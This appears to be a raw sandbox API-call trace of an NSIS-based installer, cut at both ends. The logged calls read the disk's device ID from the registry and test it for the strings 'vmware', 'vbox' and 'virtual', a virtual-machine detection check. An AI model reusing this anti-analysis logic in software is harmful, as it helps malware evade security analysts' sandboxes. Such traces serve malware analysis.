lpType=0x18f9d0, lpData=0x432c00, lpcbData=0x18f98c*=0x400 | out: lpType=0x18f9d0*=0x1, lpData="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", lpcbData=0x18f98c*=0x4c) returned 0x0 [0157.935] RegCloseKey (hKey=0x1c) returned 0x0 [0157.935] lstrcpynA (in: lpString1=0x42e3a0, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") 
returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.935] lstrlenA (lpString="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned 75 [0157.935] lstrcpynA (in: lpString1=0x40ac18, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.935] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.935] lstrcmpiA (lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", lpString2="0") returned 1 [0157.935] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.935] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.935] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.935] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.935] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.935] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.935] lstrlenA 
(lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.935] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.935] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.935] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.935] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.935] lstrcpynA (in: lpString1=0x31441c, lpString2="User32::CharLower(t R1 R1)i", iMaxLength=1024 | out: lpString1="User32::CharLower(t R1 R1)i") returned="User32::CharLower(t R1 R1)i" [0157.936] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.936] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.936] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.936] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.936] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.936] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.936] lstrcpyA (in: lpString1=0x3217a0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.936] lstrcpyA (in: lpString1=0x321bb0, lpString2="User32" | out: lpString1="User32") returned="User32" [0157.936] lstrcpyA (in: lpString1=0x321fb0, lpString2="CharLower" | out: lpString1="CharLower") returned="CharLower" [0157.936] GetModuleHandleA (lpModuleName="User32") returned 0x76780000 [0157.937] GetProcAddress (hModule=0x76780000, lpProcName="CharLower") returned 0x0 [0157.937] lstrlenA (lpString="CharLower") returned 9 [0157.937] GetProcAddress (hModule=0x76780000, lpProcName="CharLowerA") returned 0x767a3e75 [0157.937] lstrcpynA (in: lpString1=0x3217a0, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.937] lstrcpynA (in: lpString1=0x314418, lpString2="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0") returned="IDE\\DiskWD5000YS________________________________RJ13____\\5&37d1a386&0&0.0.0" [0157.937] lstrcpynA (in: lpString1=0x3217a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.937] lstrcpynA (in: lpString1=0x3217a0, 
lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.937] lstrcpyA (in: lpString1=0x432c00, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.937] wsprintfA (in: param_1=0x3217a0, param_2="%d" | out: param_1="3228696") returned 7 [0157.937] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.937] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.938] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.938] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.938] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.938] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.938] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.938] lstrcpynA (in: lpString1=0x40b018, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.938] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.938] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.938] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.938] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vmware')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vmware')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vmware')i.R0 ?c" [0157.938] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.938] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.939] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.939] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.939] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.939] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.939] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.939] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.939] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.939] lstrcpynA (in: lpString1=0x323058, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.939] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.940] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.940] lstrlenA (lpString="strstr") returned 6 [0157.940] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.940] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.940] lstrcpynA (in: lpString1=0x314418, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.940] lstrcpynA (in: lpString1=0x3217a0, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.940] lstrcpynA (in: 
lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.940] strstr (_Str="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", _SubStr="vmware") returned 0x0 [0157.940] lstrcpynA (in: lpString1=0x314820, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.940] lstrcpynA (in: lpString1=0x314820, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.940] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.940] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.940] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.940] lstrlenA (lpString="0") returned 1 [0157.940] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.941] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.941] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.941] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.941] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.941] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.941] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.941] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.941] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.941] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.941] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.942] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vbox')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vbox')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vbox')i.R0 ?c" [0157.942] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" 
[0157.942] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.942] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.942] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.942] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.942] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.942] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.943] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.943] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.943] lstrcpynA (in: lpString1=0x323058, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.943] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.943] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.943] lstrlenA (lpString="strstr") returned 6 [0157.943] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.943] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.943] lstrcpynA (in: lpString1=0x314418, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: 
lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.944] lstrcpynA (in: lpString1=0x3217a0, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.944] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.944] strstr (_Str="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", _SubStr="vbox") returned 0x0 [0157.944] lstrcpynA (in: lpString1=0x314820, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.944] lstrcpynA (in: lpString1=0x314820, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.944] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.944] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.944] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.944] lstrlenA (lpString="0") returned 1 [0157.944] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.944] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.944] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.944] 
lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.944] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.944] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.945] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.945] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.945] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.945] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.945] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.945] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'virtual')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'virtual')i.R0 ?c") returned="ntdll::strstr(t R1, t 'virtual')i.R0 ?c" [0157.945] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.945] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.945] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.945] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.946] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.946] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.946] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.946] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.946] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.946] lstrcpynA (in: lpString1=0x323058, lpString2="virtual", iMaxLength=1024 | out: lpString1="virtual") returned="virtual" [0157.946] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.946] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.946] lstrlenA (lpString="strstr") returned 6 [0157.946] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.947] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") 
returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.947] lstrcpynA (in: lpString1=0x314418, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.947] lstrcpynA (in: lpString1=0x3217a0, lpString2="virtual", iMaxLength=1024 | out: lpString1="virtual") returned="virtual" [0157.947] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.947] strstr (_Str="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", _SubStr="virtual") returned 0x0 [0157.947] lstrcpynA (in: lpString1=0x314820, lpString2="virtual", iMaxLength=1024 | out: lpString1="virtual") returned="virtual" [0157.947] lstrcpynA (in: lpString1=0x314820, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.947] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.947] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") 